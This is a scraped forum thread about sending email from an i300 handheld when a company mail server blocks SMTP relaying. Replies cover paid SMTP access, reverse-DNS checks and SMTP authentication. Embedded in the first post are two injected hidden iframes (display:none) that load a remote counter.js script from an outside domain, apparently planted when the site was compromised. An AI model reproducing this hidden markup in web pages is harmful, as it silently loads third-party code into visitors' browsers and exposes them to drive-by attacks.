+ Reply to Thread

How do I send out emails (SMTP)??

I have a i300 and am using mMail, which seems to work well. I have a common problem. My work email is on the companies pop3 server which allows me to read mail but does not allow relaying for sending out mail. what do other people do. I don't have and don't need Earthlink etc as my company provides me as my ISP

Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Peter

Administrator

Arrow

CRAIG??? you listening???

Originally posted by Marctronixx
    CRAIG??? you listening???
    No , I don't! :o

Maybe if you type slowly, I will understand.

...crawling back under my rock....

Administrator

Arrow

perhaps you did not understand my sily post...

the meaning is to tel fetal about your email setup.. perhaps he can benefit from what you are doing!

OOOOOOOOOOOOOOOHHHHHHHHHHHHHHHHH!!!!!!!!!!!

Now I understand!!

SMTP servers use to be "easy" to come by, but then came SPAM, and it's abuse of "mail relays" off of SMTP servers. Now SMTP servers are closely guarded and require a 'paid service' to access.

So you can now have SMTP access by: Paying a 3rd party for SMTP access. Use the same one your home ISP provides you - Not always possible, but if you use Eudora, Netscape or Outlook to check mail then you should be able to find the SMTP server name no problem. But you usually have to "check mail" first before it allows you access to SMTP. Or hope your work has one you can use.

I use my business' SMTP server.

-Mark

There are 2 (AFAIK) was an ISP or owner of any SMTP server can validate if you can send mail.
    1. Reverse DNS. When you dial and ISP, or even on DSL or cable, your PC device is given a network name by a DHCP server than assigns you an IP address. So if you dial earthlink, your ID might be yourpc.earthlink.net. Then Earthlink can reverse DNS your computer name when you try to send mail using its SMTP server. If the ending part of your name is not earthlink.net (their domain), then you can not send. This method REQUIRES that you actually use the ISP to connect to the internet. Having an account with the ISP is not good enough. I guess this prevents people from passing around user/passwords around to gain access.

2. Authentication. - This generally works the same as POP3 does. When you connect to the SMTP server, it asks for a user name and password, if you can not authenticate, then you are booted off.... no access. The type of set up is more flexible, because it lets you send mail via the SMTP server regardless of HOW you connect to the internet.

The only exception I know to the above is that most SMTP servers will allow you to send mail to a recipient on its domain. So, anyone can use mail.mindspring.com to send to an email address that is on mindspring. This is not considered a relay.

Spammers have ruined it for the rest of us.

Like Mark, I have my own SMTP server at my office, so I don't have a problem, but I feel for the rest of you.

HTH,
    Carl